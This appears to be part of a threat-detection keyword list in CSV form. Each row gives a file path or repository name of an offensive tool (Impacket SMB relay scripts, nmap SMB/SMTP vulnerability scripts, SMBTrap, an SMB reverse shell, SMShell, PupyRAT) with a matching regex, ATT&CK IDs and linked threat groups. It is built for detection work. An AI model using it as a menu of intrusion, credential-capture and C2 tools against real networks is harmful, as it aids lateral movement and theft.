"*/smbpasswd.py*",".{0,1000}\/smbpasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11390"
"*/smb-print-text.nse*",".{0,1000}\/smb\-print\-text\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11391"
"*/smb-protocols.nse*",".{0,1000}\/smb\-protocols\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11392"
"*/smb-psexec.nse*",".{0,1000}\/smb\-psexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11393"
"*/smbrelayserver.py*",".{0,1000}\/smbrelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","N/A","10","4","331","60","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z","11394"
"*/smbrelayx.exe*",".{0,1000}\/smbrelayx\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11395"
"*/smbrelayx.py*",".{0,1000}\/smbrelayx\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11396"
"*/smb-reverse-shell*",".{0,1000}\/smb\-reverse\-shell.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","11397"
"*/smbscan-*.csv*",".{0,1000}\/smbscan\-.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","#linux","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","11398"
"*/smbscan-*.log*",".{0,1000}\/smbscan\-.{0,1000}\.log.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","0","#linux","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","11399"
"*/smbscan.git*",".{0,1000}\/smbscan\.git.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","1","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","11400"
"*/smbscan.py*",".{0,1000}\/smbscan\.py.{0,1000}","offensive_tool_keyword","smbscan","SMBScan is a tool to enumerate file shares on an internal network.","T1135 - T1046 - T1021","TA0007 - TA0043 - TA0008","N/A","APT22","Discovery","https://github.com/jeffhacks/smbscan","1","1","N/A","N/A","8","1","44","6","2025-03-24T01:55:30Z","2021-10-26T02:28:34Z","11401"
"*/smb-security-mode.nse*",".{0,1000}\/smb\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11402"
"*/smbserver.py*",".{0,1000}\/smbserver\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","11403"
"*/smbserver/smb_server.py*",".{0,1000}\/smbserver\/smb_server\.py.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","N/A","6","555","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z","11404"
"*/smb-server-stats.nse*",".{0,1000}\/smb\-server\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11405"
"*/smb-signing-disabled-hosts.txt*",".{0,1000}\/smb\-signing\-disabled\-hosts\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","11406"
"*/smbspider.py*",".{0,1000}\/smbspider\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","11407"
"*/smbsr.db*",".{0,1000}\/smbsr\.db.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","N/A","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11408"
"*/smbsr.db*",".{0,1000}\/smbsr\.db.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","#linux","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11409"
"*/SMBSR.git*",".{0,1000}\/SMBSR\.git.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11410"
"*/SMBSR.git*",".{0,1000}\/SMBSR\.git.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","N/A","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11411"
"*/smbsr.log*",".{0,1000}\/smbsr\.log.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","#logfile #linux","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11412"
"*/smbsr.log*",".{0,1000}\/smbsr\.log.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","#logfile #linux","N/A","N/A","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11413"
"*/smbsr.py*",".{0,1000}\/smbsr\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11414"
"*/smbsr_results.csv*",".{0,1000}\/smbsr_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","11415"
"*/smb-system-info.nse*",".{0,1000}\/smb\-system\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11416"
"*/Smbtouch-Scanner.git*",".{0,1000}\/Smbtouch\-Scanner\.git.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","1","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","11417"
"*/SMBTrap.git*",".{0,1000}\/SMBTrap\.git.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","1","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","11418"
"*/smbtrap2.py*",".{0,1000}\/smbtrap2\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","1","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","11419"
"*/smbtrap-mitmproxy-inline.py*",".{0,1000}\/smbtrap\-mitmproxy\-inline\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","1","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","11420"
"*/smb-vuln.py*",".{0,1000}\/smb\-vuln\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","11421"
"*/smb-vuln-conficker.nse*",".{0,1000}\/smb\-vuln\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11422"
"*/smb-vuln-cve2009-3103.nse*",".{0,1000}\/smb\-vuln\-cve2009\-3103\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11423"
"*/smb-vuln-cve-2017-7494.nse*",".{0,1000}\/smb\-vuln\-cve\-2017\-7494\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11424"
"*/smb-vuln-cve-2020-0796.nse*",".{0,1000}\/smb\-vuln\-cve\-2020\-0796\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","11425"
"*/smb-vuln-ms06-025.nse*",".{0,1000}\/smb\-vuln\-ms06\-025\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11426"
"*/smb-vuln-ms07-029.nse*",".{0,1000}\/smb\-vuln\-ms07\-029\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11427"
"*/smb-vuln-ms08-067.nse*",".{0,1000}\/smb\-vuln\-ms08\-067\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11428"
"*/smb-vuln-ms10-054.nse*",".{0,1000}\/smb\-vuln\-ms10\-054\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11429"
"*/smb-vuln-ms10-061.nse*",".{0,1000}\/smb\-vuln\-ms10\-061\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11430"
"*/smb-vuln-ms17-010.nse*",".{0,1000}\/smb\-vuln\-ms17\-010\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11431"
"*/smb-vuln-regsvc-dos.nse*",".{0,1000}\/smb\-vuln\-regsvc\-dos\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11432"
"*/smb-vuln-webexec.nse*",".{0,1000}\/smb\-vuln\-webexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11433"
"*/smb-webexec-exploit.nse*",".{0,1000}\/smb\-webexec\-exploit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11434"
"*/SMShell.git*",".{0,1000}\/SMShell\.git.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","N/A","10","10","360","35","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z","11435"
"*/SMShell/*",".{0,1000}\/SMShell\/.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","#linux","N/A","10","10","360","35","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z","11436"
"*/smtp-brute.nse*",".{0,1000}\/smtp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11437"
"*/smtp-commands.nse*",".{0,1000}\/smtp\-commands\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11438"
"*/smtp-enum-users.nse*",".{0,1000}\/smtp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11439"
"*/smtp-ntlm-info.nse*",".{0,1000}\/smtp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11440"
